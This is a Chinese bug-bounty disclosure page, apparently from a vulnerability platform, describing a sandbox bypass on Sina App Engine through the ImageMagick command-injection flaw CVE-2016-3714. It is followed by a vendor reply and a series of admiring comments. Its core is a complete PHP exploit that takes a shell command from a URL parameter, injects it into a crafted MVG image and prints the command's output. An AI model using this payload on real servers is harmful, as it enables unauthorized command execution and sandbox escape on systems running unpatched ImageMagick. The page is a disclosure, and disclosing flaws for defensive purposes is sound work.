SAE 沙盒绕过（ImageMagick CVE20163714 应用实例）

漏洞细节：http://pastebin.com/aE4sKnCg

ImageMagick 的命令注入，当然也影响 PHP 的 ImageMagick 库。

Exploit：

<?php
 echo "Disable Functions: " . ini_get('disable_functions') . "/n";
 
 $command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
 if ($command == '') {
     $command = 'id';
 }
 
 $command = $command . ">" . SAE_TMP_PATH . "/data";
 
 $exploit = <<<EOF
 push graphic-context
 viewbox 0 0 640 480
 fill 'url(https://example.com/image.jpg"|$command")'
 pop graphic-context
 EOF;
 
 $path1 = SAE_TMP_PATH . "KKKK.mvg";
 $path2 = SAE_TMP_PATH . "KKKK.png";
 
 file_put_contents($path1, $exploit);
 $thumb = new Imagick();
 $thumb->readImage($path1);
 $thumb->writeImage($path2);
 $thumb->clear();
 $thumb->destroy();
 unlink("$path1");
 unlink("$path2");
 echo file_get_contents(SAE_TMP_PATH . "/data");
 ?>

很慢，要等一会儿..

编译安装新版本 ImageMagick。

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-05-08 17:00

厂商回复：

感谢关注新浪安全，问题修复中。

最新状态：

暂无

1. 2016-05-04 19:51 | Ricter ( 普通白帽子 | Rank:106 漏洞数:20 | 渣渣一个)

   0

   PS：我把那个 2.php 给去掉了，省的有人乱搞..

   1# 回复此人

2. 2016-05-04 19:55 | zFox49 ( 路人 | Rank:1 漏洞数:1 | 我是一只狗(´ ・ω・｀))

   0

   RR哥哥好厉害！ 窝竟然有幸见证。 又学习了一个，人生经验。 从看到新闻到制造新闻，Nice！ ╮(๑╹◡╹๑)╭

   2# 回复此人

3. 2016-05-04 19:57 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

   0

   菊苣

   3# 回复此人

4. 2016-05-04 20:05 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

   0

   牛逼

   4# 回复此人

5. 2016-05-04 20:15 | boooooom ( 普通白帽子 | Rank:486 漏洞数:53 | 我有一个好想法！)

   0

   牛逼，感觉不是很科学的样子啊。

   5# 回复此人

6. 2016-05-04 21:30 | erevus ( 普通白帽子 | Rank:201 漏洞数:33 )

   0

   膜拜菊苣

   6# 回复此人

7. 2016-05-05 04:53 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络！一个有梦想的16岁...)

   0

   牛逼

   7# 回复此人

8. 2016-05-06 11:32 | Is0Man ( 路人 | Rank:6 漏洞数:2 | you still have lots more to work on)

   0

   牛逼，MARK一下

   8# 回复此人

9. 2016-05-06 12:03 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

   0

   膜拜菊苣

   9# 回复此人

10. 2016-05-07 15:36 | 橘子 ( 路人 | Rank:0 漏洞数:3 | 呢个.....)

    0

    膜拜菊苣

    10# 回复此人